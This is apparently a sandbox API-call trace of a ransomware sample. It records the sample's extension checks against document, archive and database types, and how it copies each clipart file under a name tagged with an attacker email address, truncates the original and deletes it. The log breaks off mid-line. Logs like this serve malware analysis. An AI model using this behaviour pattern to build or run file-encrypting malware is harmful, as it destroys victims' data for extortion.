[0271.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.420] lstrlenW (lpString=".zip") returned 4 [0271.420] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.420] lstrlenW (lpString=".rar") returned 4 [0271.420] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.420] lstrlenW (lpString=".bz2") returned 4 [0271.420] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.420] lstrlenW (lpString=".7z") returned 3 [0271.420] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString=".dbf") returned 4 [0271.421] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString=".1cd") returned 4 [0271.421] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString=".jpg") returned 4 [0271.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString=".doc") returned 4 [0271.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString=".docx") returned 5 [0271.421] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.421] lstrlenW (lpString=".pdf") returned 4 [0271.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString=".xls") returned 4 [0271.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.421] lstrlenW (lpString=".xlsx") returned 5 [0271.421] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.421] lstrlenW (lpString=".ppt") returned 4 [0271.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.421] lstrlenW (lpString=".zip") returned 4 [0271.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.421] lstrlenW (lpString=".rar") returned 4 [0271.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.421] lstrlenW (lpString=".bz2") returned 4 [0271.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.422] lstrlenW (lpString=".7z") returned 3 [0271.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.422] lstrlenW (lpString=".dbf") returned 4 [0271.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.422] lstrlenW (lpString=".1cd") returned 4 [0271.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0271.422] lstrlenW (lpString=".jpg") returned 4 [0271.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.422] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.422] lstrlenW (lpString="BS00444_.WMF") returned 12 [0271.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.430] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3896) returned 1 [0271.430] CloseHandle (hObject=0x388) returned 1 [0271.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 0x20 [0271.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.491] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.491] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.500] GetLastError () returned 0x0 [0271.500] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xf38, lpOverlapped=0x0) returned 1 [0271.502] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xf40, lpOverlapped=0x0) returned 1 [0271.503] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.503] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.503] SetEndOfFile (hFile=0x3a0) returned 1 [0271.503] CloseHandle (hObject=0x3a0) returned 1 [0271.503] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.503] SetEndOfFile (hFile=0x39c) returned 1 [0271.505] CloseHandle (hObject=0x39c) returned 1 [0271.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.506] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0271.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.506] lstrlenW (lpString=".doc") returned 4 [0271.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString=".docx") returned 5 [0271.507] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.507] lstrlenW (lpString=".pdf") returned 4 [0271.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString=".xls") returned 4 [0271.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.507] lstrlenW (lpString=".xlsx") returned 5 [0271.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.507] lstrlenW (lpString=".ppt") returned 4 [0271.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString=".zip") returned 4 [0271.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.507] lstrlenW (lpString=".rar") returned 4 [0271.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString=".bz2") returned 4 [0271.507] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString=".7z") returned 3 [0271.507] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString=".dbf") returned 4 [0271.507] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString=".1cd") returned 4 [0271.507] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString=".jpg") returned 4 [0271.507] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.507] lstrlenW (lpString=".doc") returned 4 [0271.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString=".docx") returned 5 [0271.508] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.508] lstrlenW (lpString=".pdf") returned 4 [0271.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString=".xls") returned 4 [0271.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.508] lstrlenW (lpString=".xlsx") returned 5 [0271.508] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.508] lstrlenW (lpString=".ppt") returned 4 [0271.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.508] lstrlenW (lpString=".zip") returned 4 [0271.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.508] lstrlenW (lpString=".rar") returned 4 [0271.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString=".bz2") returned 4 [0271.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString=".7z") returned 3 [0271.508] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.508] lstrlenW (lpString=".dbf") returned 4 [0271.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.508] lstrlenW (lpString=".1cd") returned 4 [0271.508] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0271.508] lstrlenW (lpString=".jpg") returned 4 [0271.508] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.508] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.509] lstrlenW (lpString="BS01634_.WMF") returned 12 [0271.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.509] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3494) returned 1 [0271.509] CloseHandle (hObject=0x39c) returned 1 [0271.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 0x20 [0271.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.509] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.509] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.510] GetLastError () returned 0x0 [0271.510] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xda6, lpOverlapped=0x0) returned 1 [0271.511] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xdb0, lpOverlapped=0x0) returned 1 [0271.512] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.513] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.513] SetEndOfFile (hFile=0x3a0) returned 1 [0271.513] CloseHandle (hObject=0x3a0) returned 1 [0271.513] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.513] SetEndOfFile (hFile=0x39c) returned 1 [0271.649] CloseHandle (hObject=0x39c) returned 1 [0271.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.710] lstrlenW (lpString=".doc") returned 4 [0271.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".docx") returned 5 [0271.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.710] lstrlenW (lpString=".pdf") returned 4 [0271.710] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".xls") returned 4 [0271.710] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.710] lstrlenW (lpString=".xlsx") returned 5 [0271.710] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.710] lstrlenW (lpString=".ppt") returned 4 [0271.710] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.710] lstrlenW (lpString=".zip") returned 4 [0271.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.710] lstrlenW (lpString=".rar") returned 4 [0271.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".bz2") returned 4 [0271.710] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString=".7z") returned 3 [0271.710] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.710] lstrlenW (lpString=".dbf") returned 4 [0271.710] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.710] lstrlenW (lpString=".1cd") returned 4 [0271.710] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".jpg") returned 4 [0271.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".doc") returned 4 [0271.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".docx") returned 5 [0271.711] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.711] lstrlenW (lpString=".pdf") returned 4 [0271.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".xls") returned 4 [0271.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.711] lstrlenW (lpString=".xlsx") returned 5 [0271.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.711] lstrlenW (lpString=".ppt") returned 4 [0271.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".zip") returned 4 [0271.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.711] lstrlenW (lpString=".rar") returned 4 [0271.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".bz2") returned 4 [0271.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString=".7z") returned 3 [0271.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".dbf") returned 4 [0271.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".1cd") returned 4 [0271.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0271.711] lstrlenW (lpString=".jpg") returned 4 [0271.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.712] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.712] lstrlenW (lpString="BS01637_.WMF") returned 12 [0271.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.712] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3948) returned 1 [0271.712] CloseHandle (hObject=0x2cc) returned 1 [0271.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 0x20 [0271.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.713] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.713] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.713] GetLastError () returned 0x0 [0271.713] ReadFile (in: hFile=0x2cc, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xf6c, lpOverlapped=0x0) returned 1 [0271.739] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xf70, lpOverlapped=0x0) returned 1 [0271.740] ReadFile (in: hFile=0x2cc, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.740] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.740] SetEndOfFile (hFile=0x394) returned 1 [0271.917] CloseHandle (hObject=0x394) returned 1 [0271.923] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.923] SetEndOfFile (hFile=0x2cc) returned 1 [0271.929] CloseHandle (hObject=0x2cc) returned 1 [0271.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0271.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.978] lstrlenW (lpString=".doc") returned 4 [0271.978] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.978] lstrlenW (lpString=".docx") returned 5 [0271.978] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.978] lstrlenW (lpString=".pdf") returned 4 [0271.978] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.978] lstrlenW (lpString=".xls") returned 4 [0271.978] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.978] lstrlenW (lpString=".xlsx") returned 5 [0271.978] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.978] lstrlenW (lpString=".ppt") returned 4 [0271.978] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.978] lstrlenW (lpString=".zip") returned 4 [0271.978] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.978] lstrlenW (lpString=".rar") returned 4 [0271.978] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString=".bz2") returned 4 [0271.979] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString=".7z") returned 3 [0271.979] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0271.979] lstrlenW (lpString=".dbf") returned 4 [0271.979] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.979] lstrlenW (lpString="C:\\Program 